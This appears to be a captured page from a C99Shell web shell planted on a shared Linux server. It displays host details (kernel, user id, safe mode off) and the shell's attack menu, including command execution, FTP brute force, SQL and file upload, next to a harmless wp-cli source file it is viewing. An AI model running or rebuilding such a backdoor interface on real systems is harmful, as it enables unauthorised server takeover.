!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/local/wp/vendor/wp-cli/doctor-command/src/Check/   drwxr-xr-x
Free 713.64 GB of 879.6 GB (81.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     File.php (1000 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace WP_CLI\Doctor\Check;

use WP_CLI\Doctor\Check;

/**
 * Check files on the filesystem.
 */
abstract class File extends Check {

    /**
     * File checks are run as their own group.
     */
    protected $_when = false;

    /**
     * File extension to check.
     *
     * Separate multiple file extensions with a '|'.
     *
     * @var string
     */
    protected $extension = 'php';

    /**
     * Check a specific file path.
     *
     * Value should be relative to ABSPATH (e.g. 'wp-content' or 'wp-config.php')
     *
     * @var string
     */
    protected $path = '';

    /**
     * Only check the wp-content directory.
     *
     * @var boolean
     */
    protected $only_wp_content = false;

    /**
     * Any files matching the check.
     *
     * @var array
     */
    protected $_matches = array();

    /**
     * Get the options for this check
     *
     * @return string
     */
    public function get_options() {
        return array(
            'extension'       => $this->extension,
            'only_wp_content' => $this->only_wp_content,
            'path'            => $this->path,
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0646 ]--